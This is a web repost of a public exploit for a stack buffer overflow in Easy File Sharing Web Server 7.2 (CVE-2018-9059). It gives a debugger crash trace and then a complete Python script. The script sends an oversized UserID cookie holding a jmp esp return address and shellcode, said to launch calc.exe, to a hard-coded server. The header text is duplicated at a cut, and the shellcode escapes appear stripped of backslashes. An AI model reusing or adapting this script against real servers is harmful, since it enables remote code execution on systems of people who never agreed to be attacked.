Easy File Sharing Web Server 7.2 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 516

# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
# Date: 03/24/2018
# Exploit Author: rebeyond - http://www.rebeyond.net
# Vendor Homepage: http://www.sharing-fil # Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
# Date: 03/24/2018
# Exploit Author: rebeyond - http://www.rebeyond.net
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# CVE: CVE-2018-9059
# Tested on: Windows XP Professional SP3
#
# Description:
# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
#
#
# The stack trace is as follows:
# (40d8.2980): Access violation - code c0000005 (first chance)
# r
# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:EFS SoftwareEasy File Sharing Web Serversqlite3.dll -
# sqlite3!sqlite3_errcode+0x8e:
# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
#
# kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
# *** WARNING: Unable to verify checksum for fsws.exe
# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3

import requests
host='192.168.50.30'
port='80'

buf='A'*4071
buf +='x12x45xfax7f' #jmp esp
buf +='A'*12
buf +='xebx36' #jmp 0x36
buf +='A'*42
buf +='x60x30xc7x61'*2 #must be valid address
buf +='A'*4
#shellcode to execute calc.exe on remote server
buf += "xdbxdcxd9x74x24xf4x58xbbx24xa7x26xecx33"
buf += "xc9xb1x31x31x58x18x03x58x18x83xe8xd8x45"
buf += "xd3x10xc8x08x1cxe9x08x6dx94x0cx39xadxc2"
buf += "x45x69x1dx80x08x85xd6xc4xb8x1ex9axc0xcf"
buf += "x97x11x37xe1x28x09x0bx60xaax50x58x42x93"
buf += "x9axadx83xd4xc7x5cxd1x8dx8cxf3xc6xbaxd9"
buf += "xcfx6dxf0xccx57x91x40xeex76x04xdbxa9x58"
buf += "xa6x08xc2xd0xb0x4dxefxabx4bxa5x9bx2dx9a"
buf += "xf4x64x81xe3x39x97xdbx24xfdx48xaex5cxfe"
buf += "xf5xa9x9ax7dx22x3fx39x25xa1xe7xe5xd4x66"
buf += "x71x6dxdaxc3xf5x29xfexd2xdax41xfax5fxdd"
buf += "x85x8bx24xfax01xd0xffx63x13xbcxaex9cx43"
buf += "x1fx0ex39x0fx8dx5bx30x52xdbx9axc6xe8xa9"
buf += "x9dxd8xf2x9dxf5xe9x79x72x81xf5xabx37x7d"
buf += "xbcxf6x11x16x19x63x20x7bx9ax59x66x82x19"
buf += "x68x16x71x01x19x13x3dx85xf1x69x2ex60xf6"
buf += "xdex4fxa1x95x81xc3x29x74x24x64xcbx88"

cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)